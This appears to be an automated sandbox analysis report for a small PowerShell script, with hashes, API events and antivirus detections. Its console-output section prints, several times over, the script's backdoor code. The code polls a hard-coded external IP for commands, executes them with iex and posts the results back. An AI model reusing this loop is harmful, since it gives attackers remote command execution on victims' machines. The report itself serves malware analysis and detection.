Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 7, 2023, 9:29 a.m.	Aug. 7, 2023, 9:32 a.m.

Size	524.0B
Type	ASCII text, with very long lines
MD5	`578bed560ab7fb3eb7de6c8e4d468975`
SHA256	`4666fad6a3097dd70ec63cc3dc9dba683062fbe5ce03cd944694d3f2fae10692`
CRC32	`5525F534`
ssdeep	`12:UOeZt6GGuzicS4s/GuzirK4sIZ24CNB/q2GdSuhl4sQ3ciTLgyaISHacPQ:6ILu3Syu5yKNBCdS2lhgLw6t`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\shellcommand.ps1
3064

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 3500 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x00000023	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\shellcommand.ps1:1 char:91 console_handle: 0x00000047	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: + $s='173.254.247.87:8080';$i='0624d2c7-c61e54c0-8ac4978b';$p='http://';$v=Invo console_handle: 0x00000053	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: ke-WebRequest <<<< -UseBasicParsing -Uri $p$s/0624d2c7 -Headers @{"Authorizati console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: on"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/c61e54c0 console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: -Headers @{"Authorization"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAc console_handle: 0x00000077	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: tion Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest - console_handle: 0x00000083	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: Uri $p$s/8ac4978b -Method POST -Headers @{"Authorization"=$i} -Body ([System.Te console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: xt.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8} console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: ommandNotFoundException console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x000000df	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x000000eb	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x000000f7	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\shellcommand.ps1:1 char:194 console_handle: 0x00000103	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: + $s='173.254.247.87:8080';$i='0624d2c7-c61e54c0-8ac4978b';$p='http://';$v=Invo console_handle: 0x0000010f	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: ke-WebRequest -UseBasicParsing -Uri $p$s/0624d2c7 -Headers @{"Authorization"=$i console_handle: 0x0000011b	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: };while ($true){$c=(Invoke-WebRequest <<<< -UseBasicParsing -Uri $p$s/c61e54c0 console_handle: 0x00000127	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: -Headers @{"Authorization"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAc console_handle: 0x00000133	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: tion Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest - console_handle: 0x0000013f	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: Uri $p$s/8ac4978b -Method POST -Headers @{"Authorization"=$i} -Body ([System.Te console_handle: 0x0000014b	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: xt.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8} console_handle: 0x00000157	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Invoke-WebRequest:String) [], C console_handle: 0x00000163	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: ommandNotFoundException console_handle: 0x0000016f	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000017b	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: Invoke-Expression : Cannot bind argument to parameter 'Command' because it is n console_handle: 0x0000019b	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: ull. console_handle: 0x000001a7	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\shellcommand.ps1:1 char:297 console_handle: 0x000001b3	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: + $s='173.254.247.87:8080';$i='0624d2c7-c61e54c0-8ac4978b';$p='http://';$v=Invo console_handle: 0x000001bf	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: ke-WebRequest -UseBasicParsing -Uri $p$s/0624d2c7 -Headers @{"Authorization"=$i console_handle: 0x000001cb	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: };while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/c61e54c0 -Head console_handle: 0x000001d7	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: ers @{"Authorization"=$i}).Content;if ($c -ne 'None') {$r=iex <<<< $c -ErrorAc console_handle: 0x000001e3	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: tion Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest - console_handle: 0x000001ef	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: Uri $p$s/8ac4978b -Method POST -Headers @{"Authorization"=$i} -Body ([System.Te console_handle: 0x000001fb	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: xt.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8} console_handle: 0x00000207	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: + CategoryInfo : InvalidData: (:) [Invoke-Expression], ParameterB console_handle: 0x00000213	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: indingValidationException console_handle: 0x0000021f	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: + FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,M console_handle: 0x0000022b	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: icrosoft.PowerShell.Commands.InvokeExpressionCommand console_handle: 0x00000237	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x0000025b	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x00000267	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x00000273	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: At C:\Users\test22\AppData\Local\Temp\shellcommand.ps1:1 char:386 console_handle: 0x0000027f	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: + $s='173.254.247.87:8080';$i='0624d2c7-c61e54c0-8ac4978b';$p='http://';$v=Invo console_handle: 0x0000028b	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: ke-WebRequest -UseBasicParsing -Uri $p$s/0624d2c7 -Headers @{"Authorization"=$i console_handle: 0x00000297	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: };while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/c61e54c0 -Head console_handle: 0x000002a3	1	1
WriteConsoleW Aug. 7, 2023, 9:30 a.m.	buffer: ers @{"Authorization"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction S console_handle: 0x000002af	1	1

Uses Windows APIs to generate a cryptographic key (8 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 7, 2023, 9:30 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ff5080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 7, 2023, 9:30 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ff5080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 7, 2023, 9:30 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ff5080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 7, 2023, 9:30 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ff5080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 7, 2023, 9:30 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ff5080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 7, 2023, 9:30 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ff5080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 7, 2023, 9:30 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ff5080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 7, 2023, 9:30 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ff5080 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 7, 2023, 9:30 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (22 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06260000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02649000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05870000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05872000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05873000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062cd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062ce000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05874000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05875000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 7, 2023, 9:30 a.m.	process_identifier: 3064 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05876000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by 15 AntiVirus engines on VirusTotal as malicious (15 events)

ALYac	Heur.BZC.PZQ.Boxter.919.55EA63A2
Sangfor	Trojan.Generic-Script.Save.6b8ede69
Avast	Script:SNH-gen [PUP]
Cynet	Malicious (score: 99)
BitDefender	Heur.BZC.PZQ.Boxter.919.55EA63A2
MicroWorld-eScan	Heur.BZC.PZQ.Boxter.919.55EA63A2
Emsisoft	Heur.BZC.PZQ.Boxter.919.55EA63A2 (B)
F-Secure	Trojan.TR/PShell.Hoax.G3
VIPRE	Heur.BZC.PZQ.Boxter.919.55EA63A2
FireEye	Heur.BZC.PZQ.Boxter.919.55EA63A2
GData	Heur.BZC.PZQ.Boxter.919.55EA63A2
Avira	TR/PShell.Hoax.G3
Arcabit	Heur.BZC.PZQ.Boxter.919.55EA63A2
MAX	malware (ai score=82)
AVG	Script:SNH-gen [PUP]

shellcommand.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All